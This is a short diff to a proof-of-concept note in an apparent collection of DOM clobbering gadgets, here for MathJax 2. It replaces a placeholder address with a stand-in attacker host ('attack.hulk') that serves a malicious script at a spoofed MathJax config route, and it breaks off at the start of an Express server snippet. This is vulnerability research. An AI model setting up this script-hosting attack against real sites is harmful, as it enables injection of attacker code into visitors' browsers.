jackfromeast/dom-clobbering-collection/domc-gadgets/mathjax2.md

 ## PoC

-Please note that for the following proof of concept, you will need to replace `xxx.xxx.xxx` with your own server address to host the malicious script and configure the URL to route `//config/TeX-AMS-MML_HTMLorMML.js`.
+Please note that for the following proof of concept, you will need to replace `attack.hulk` with your own server address to host the malicious script and configure the URL to route `//config/TeX-AMS-MML_HTMLorMML.js`.
 ```
 const express = require('express');
 const path = require('path');